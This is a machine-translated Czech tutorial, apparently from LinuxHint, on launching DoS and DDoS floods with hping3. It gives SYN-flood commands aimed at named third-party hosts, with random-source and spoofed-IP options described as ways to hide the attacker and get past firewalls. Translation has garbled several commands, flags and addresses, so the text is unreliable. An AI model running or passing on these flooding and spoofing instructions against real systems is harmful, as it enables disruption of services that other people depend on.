hping3 povodeň ddos

Hping3 Flood Ddos



Tento výukový program se zaměřuje na útoky DDOS (Distributed Denial of Service) pomocí nástroje hping3. Pokud jste se již seznámili s útoky DOS (Denial of Service) a DDOS, můžete pokračovat ve čtení praktických pokynů hping3, v opačném případě doporučujeme seznámit se s tím, jak tyto útoky fungují.

Útoky DOS


Útok typu Denial of Service (DOS) je velmi jednoduchá technika pro odepření přístupu ke službám (proto se nazývá útok Denial of Service). Tento útok spočívá v přetížení cíle nadměrnými pakety nebo jejich velkým množstvím.







I když je tento útok velmi snadno proveditelný, neohrožuje informace ani soukromí cíle, nejedná se o penetrační útok a jeho cílem je pouze zabránit přístupu k cíli.
Odesláním množství paketů cíl nemůže zvládnout, útočníci brání serveru v obsluze legitimních uživatelů.



Útoky DOS se provádějí z jednoho zařízení, proto je lze snadno zastavit zablokováním adresy IP útočníka, ale útočník může změnit a dokonce zfalšovat (klonovat) cílovou adresu IP, ale pro brány firewall není těžké se s takovými útoky vypořádat , na rozdíl od toho, co se stane s útoky DDOS.



Útoky DDOS

Útok DDOS (Distributed Denial of Service) je podobný útoku DOS, ale probíhá z různých uzlů (nebo různých útočníků) současně. Útoky DDOS běžně provádějí botnety. Botnety jsou automatizované skripty nebo programy, které infikují počítače za účelem provedení automatizovaného úkolu (v tomto případě útoku DDOS). Hacker může vytvořit botnet a infikovat mnoho počítačů, ze kterých botnety zahájí útoky DOS. Skutečnost, že mnoho botnetů střílí současně, změní útok DOS na útok DDOS (proto se nazývá distribuovaný).





Samozřejmě existují výjimky, ve kterých byly útoky DDOS prováděny skutečnými lidskými útočníky, například hackerská skupina Anonymous integrovaná tisíci lidí na celém světě používala tuto techniku ​​velmi často kvůli její snadné implementaci (vyžadovala pouze dobrovolníky, kteří sdíleli svou příčinu), tak například Anonymous nechal Kaddáfího libyjskou vládu během invaze zcela odpojit, libyjský stát zůstal bezbranný před tisíci útočníků z celého světa.

Tomuto typu útoků, když jsou prováděny z mnoha různých uzlů, je extrémně obtížné zabránit a zastavit je a obvykle vyžadují řešení speciálního hardwaru, protože brány firewall a obranné aplikace nejsou připraveny vypořádat se s tisíci útočníky současně. Nejde o hping3, většina útoků prováděných prostřednictvím tohoto nástroje bude blokována obrannými zařízeními nebo softwarem, přesto je užitečná v místních sítích nebo proti špatně chráněným cílům.



O hping3

Nástroj hping3 vám umožňuje odesílat manipulované pakety. Tento nástroj vám umožňuje řídit velikost, množství a fragmentaci paketů za účelem přetížení cíle a obejití nebo útoku na brány firewall. Hping3 může být užitečný pro účely zabezpečení nebo testování schopností, pomocí něj můžete testovat účinnost firewallů a pokud server zvládne velké množství paketů. Níže naleznete pokyny k použití hping3 pro účely testování zabezpečení.

Začínáme s útoky DDOS pomocí hping3:

Na distribucích Debianu a Linuxu můžete nainstalovat hping3 spuštěním:

#výstižnýNainstalujtehping3-a

Jednoduchý útok DOS (ne DDOS) by byl:

#sudohping3-S --zaplavit -PROTI -p 80170,155,9,985

Kde:
sudo: poskytuje potřebná oprávnění ke spuštění hping3.
hping3:
volá program hping3.
-S: určuje pakety SYN.
-zaplavit: střílejte podle uvážení, odpovědi budou ignorovány (proto se odpovědi nebudou zobrazovat) a pakety budou odesílány co nejrychleji.
-PROTI: Výřečnost.
-p 80: port 80, můžete toto číslo nahradit službou, na kterou chcete zaútočit.
170.155.9.185: cílová IP.

Zaplavte pomocí paketů SYN proti portu 80:

Následující příklad zobrazuje útok SYN proti lacampora.org:

#sudohping3 lacampora.org-q -n -d 120 -S -p 80 --zaplavit --rand-source

Kde:
Lacampora.org: je cíl
-q: krátký výstup
-n: zobrazit cílovou IP namísto hostitele.
-d 120: nastavit velikost paketu
-značkový zdroj: skrýt IP adresu.

Následující příklad ukazuje další možný příklad záplavy:

Povodeň SYN proti portu 80:

#sudohping3--rand-sourceivan.com-S -q -p 80 --zaplavit

S hping3 můžete také útočit na své cíle pomocí falešné IP, abyste mohli obejít bránu firewall, můžete dokonce klonovat svou cílovou IP nebo jakoukoli povolenou adresu, kterou možná znáte (můžete toho dosáhnout například pomocí Nmap nebo sniffer, abyste mohli poslouchat zavedené připojení).

Syntaxe by byla:

#sudohping3-na <FAKE IP> <cílová> -S -q -p 80 -rychleji -c2

V tomto praktickém příkladu by útok vypadal:

#sudohping3-na190.0.175.100 190.0.175.100-S -q -p 80 -rychleji -c2

Doufám, že jste tento návod na hping3 považovali za užitečný. Sledujte LinuxHint a získejte další tipy a aktualizace pro Linux a sítě.